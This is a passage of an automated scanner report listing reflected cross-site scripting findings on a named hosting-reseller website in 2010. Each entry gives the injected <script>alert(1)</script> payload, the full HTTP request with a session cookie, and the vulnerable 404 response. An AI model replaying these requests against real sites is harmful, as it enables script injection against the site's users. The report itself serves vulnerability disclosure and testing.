Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/search.php?keyword=search...&Submit3=Search&opt=2cd28e<a>7b45bce360b was not found on this server.</p>
...[SNIP]...

2.5511. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b52fc<script>alert(1)</script>fec6a08e668 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-serviceb52fc<script>alert(1)</script>fec6a08e668/web-hosting/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-serviceb52fc<script>alert(1)</script>fec6a08e668/web-hosting/themes/ was not found on this server.</p>
...[SNIP]...

2.5512. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a42e<script>alert(1)</script>c972eee95c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting8a42e<script>alert(1)</script>c972eee95c3/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting8a42e<script>alert(1)</script>c972eee95c3/themes/ was not found on this server.</p>
...[SNIP]...

2.5513. http://www.resellerbase.com/web-service/web-hosting/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a0c50<script>alert(1)</script>2ff42f258ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesa0c50<script>alert(1)</script>2ff42f258ff/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesa0c50<script>alert(1)</script>2ff42f258ff/ was not found on this server.</p>
...[SNIP]...

2.5514. http://www.resellerbase.com/web-service/web-hosting/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4fd4b<script>alert(1)</script>c1b9e77580b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/?4fd4b<script>alert(1)</script>c1b9e77580b=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/?4fd4b<script>alert(1)</script>c1b9e77580b=1 was not found on this server.</p>
...[SNIP]...

2.5515. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e2541<script>alert(1)</script>81db2b567af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicee2541<script>alert(1)</script>81db2b567af/web-hosting/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicee2541<script>alert(1)</script>81db2b567af/web-hosting/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5516. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 22bbe<script>alert(1)</script>3b9d7f01149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting22bbe<script>alert(1)</script>3b9d7f01149/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting22bbe<script>alert(1)</script>3b9d7f01149/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5517. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88cd2<script>alert(1)</script>f8cb615632b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes88cd2<script>alert(1)</script>f8cb615632b/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes88cd2<script>alert(1)</script>f8cb615632b/kosmos/ was not found on this server.</p>
...[SNIP]...

2.5518. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d55fc<script>alert(1)</script>14e68ab6ef7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosd55fc<script>alert(1)</script>14e68ab6ef7/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosd55fc<script>alert(1)</script>14e68ab6ef7/ was not found on this server.</p>
...[SNIP]...

2.5519. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 13177<script>alert(1)</script>161e46cc43d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/?13177<script>alert(1)</script>161e46cc43d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/?13177<script>alert(1)</script>161e46cc43d=1 was not found on this server.</p>
...[SNIP]...

2.5520. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdd50<script>alert(1)</script>c85ea76de8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicebdd50<script>alert(1)</script>c85ea76de8/web-hosting/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicebdd50<script>alert(1)</script>c85ea76de8/web-hosting/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5521. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bc68<script>alert(1)</script>a1203984585 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting5bc68<script>alert(1)</script>a1203984585/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting5bc68<script>alert(1)</script>a1203984585/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5522. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68de2<script>alert(1)</script>2ab03ca16bf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes68de2<script>alert(1)</script>2ab03ca16bf/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes68de2<script>alert(1)</script>2ab03ca16bf/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.5523. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f34bf<script>alert(1)</script>61d1657f49c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosf34bf<script>alert(1)</script>61d1657f49c/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosf34bf<script>alert(1)</script>61d1657f49c/images/ was not found on this server.</p>
...[SNIP]...

2.5524. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 999a4<script>alert(1)</script>f62e1399db9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images999a4<script>alert(1)</script>f62e1399db9/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images999a4<script>alert(1)</script>f62e1399db9/ was not found on this server.</p>
...[SNIP]...

2.5525. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 66645<script>alert(1)</script>11be44aab0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/?66645<script>alert(1)</script>11be44aab0d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/?66645<script>alert(1)</script>11be44aab0d=1 was not found on this server.</p>
...[SNIP]...

2.5526. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5b642<script>alert(1)</script>55aa7b48e2b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service5b642<script>alert(1)</script>55aa7b48e2b/web-hosting/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:49:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service5b642<script>alert(1)</script>55aa7b48e2b/web-hosting/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5527. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32ab2<script>alert(1)</script>35927758278 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting32ab2<script>alert(1)</script>35927758278/themes/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting32ab2<script>alert(1)</script>35927758278/themes/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5528. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f5788<script>alert(1)</script>22abe3a960b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesf5788<script>alert(1)</script>22abe3a960b/kosmos/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesf5788<script>alert(1)</script>22abe3a960b/kosmos/images/folder.gif was not found on this server.</p>
...[SNIP]...

2.5529. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/folder.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /web-service/web-hosting/themes/kosmos/images/folder.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f709<script>alert(1)</script>50d7bab0f7a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos7f709<script>alert(1)</script>50d7bab0f7a/images/folder.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:50:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos7f709<script>alert(1)</script>50d7bab0f7a/images/folder.gif was not found on this server.</p>
...[SNIP]...

